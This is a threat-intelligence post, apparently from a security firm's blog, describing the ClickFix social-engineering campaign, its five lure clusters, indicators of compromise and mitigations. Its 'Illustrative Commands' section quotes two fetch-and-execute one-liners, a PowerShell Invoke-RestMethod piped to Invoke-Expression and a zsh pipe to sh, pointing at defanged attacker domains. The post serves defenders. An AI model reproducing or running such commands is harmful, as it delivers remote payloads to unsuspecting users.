ClickFix Threats Target Windows And macOS Systems

Executive Summary

The Insikt Group’s latest intelligence reveals a sophisticated, multi‑cluster social engineering campaign known as ClickFix. Leveraging deceptive interfaces that mimic trusted applications such as Intuit QuickBooks and Booking.com, the threat actors compel victims to manually execute obfuscated commands within native system tools. This technique, which bypasses conventional browser and endpoint defenses, has evolved into a high‑return template adopted by both low‑tier attackers and advanced persistent threat (APT) groups. The following report presents the technical landscape, operational clusters, indicators of compromise, and actionable mitigations.

Threat Landscape

ClickFix utilizes a living‑off‑the‑land (LotL) approach: malicious scripts are delivered in‑memory through legitimate binaries (e.g., Windows Run dialog, PowerShell, macOS Terminal). The campaign’s core TTPs align with MITRE ATT&CK techniques T1059, T1218, and T1547. Actors manipulate users into copying and pasting encoded payloads, thereby evading standard signature‑based detection.

Five Distinct Clusters

Insikt Group identified five clusters, each targeting different sectors but sharing the same execution framework:

  1. Intuit QuickBooks (Accounting) – impersonates QuickBooks during tax season.
  2. Booking.com (Travel) – presents fake reCAPTCHA challenges.
  3. Birdeye (AI Marketing) – exploits Cloudflare‑protected domains.
  4. Dual‑Platform Selection – OS detection delivers tailored Windows or macOS lures.
  5. macOS Storage Cleaning – masquerades as system optimization utilities.

Technical Execution Flow

The standardized four‑stage pattern is consistent across platforms:

  • Obfuscated Input – highly encoded strings (hex, base64) are presented to the user.
  • Native Execution – users paste the command into trusted shells (PowerShell, zsh, bash).
  • Remote Ingress – scripts fetch secondary payloads from actor‑controlled domains.
  • In‑Memory Execution – payloads are piped directly into interpreters, leaving minimal on‑disk artifacts.

Illustrative Commands

PowerShell example (Cluster 1): powershell -NoProfile -ExecutionPolicy Bypass -c "&{Invoke‑RestMethod -Uri 'hxxps://nobovcs[.]com/stage' | Invoke‑Expression}"

macOS example (Cluster 4): zsh -c "echo '-kfsSL https://octopox[.]com/download' | sh"

Indicators of Compromise

Below is a sanitized representation of key IOC tables. IP addresses have been bracketed, and URLs are obfuscated with hxxps.

Cluster 1 – Intuit QuickBooks

DomainIP AddressFirst SeenLast Seen
mrinmay[.]net193[.]35[.]17[.]122026-02-212026-03-05
ariciversontile[.]com193[.]35[.]17[.]122026-02-202026-02-25

Cluster 2 – Booking.com

DomainIP AddressFirst SeenLast Seen
sign-in-op-token[.]com91[.]202[.]233[.]2062026-03-012026-03-03
thestayreserve[.]com91[.]202[.]233[.]2062026-02-232026-02-24

Cluster 3 – Birdeye

DomainFirst SeenLast Seen
birdrankbox[.]com2024-05-162026-03-05

Cluster 4 – Dual‑Platform Selection

DomainIP AddressFirst SeenLast Seen
macosapp-apple[.]com45[.]144[.]233[.]1922025-11-122026-03-05

Cluster 5 – macOS Storage Cleaning

DomainIP AddressFirst SeenLast Seen
macos-storageperf[.]comCloudflare2026-02-062026-03-05

Mitigation Recommendations

Defenders should adopt a layered, behavior‑centric approach:

  • Disable Windows Run Dialog – Group Policy: Win+R and Run command removal.
  • PowerShell Constrained Language Mode – restrict script execution to CLM.
  • AppLocker / WDAC Policies – block untrusted LOLBins.
  • macOS Shell Controls – enforce SIP and restrict Terminal via MDM.
  • User Awareness Training – simulate malicious copy‑paste scenarios.
  • Threat Intelligence Integration – feed IPs and domain hashes into SIEM/EDR.
  • HTML Content Analysis – monitor brand impersonation sites using Recorded Future.

Outlook

Given the campaign’s rapid evolution, future iterations are expected to incorporate fine‑grained browser fingerprinting and more obfuscated staging scripts. Attackers will likely continue to rely on user‑facilitated execution to sidestep hardened endpoint defenses. Continuous monitoring of HTML artifacts and aggressive hardening of native utilities remain the most effective countermeasures.

Leave a Reply

Looking for the Best Cyber Security?

Seamlessly integrate local and cloud resources with our comprehensive cybersecurity services. Protect user traffic at endpoints using advanced security solutions like threat hunting and endpoint protection. Build a scalable network infrastructure with continuous monitoring, incident response, and compliance assessments.

Contact Us

Copyright © 2025 ESSGroup

Discover more from ESSGroup

Subscribe now to keep reading and get access to the full archive.

Continue reading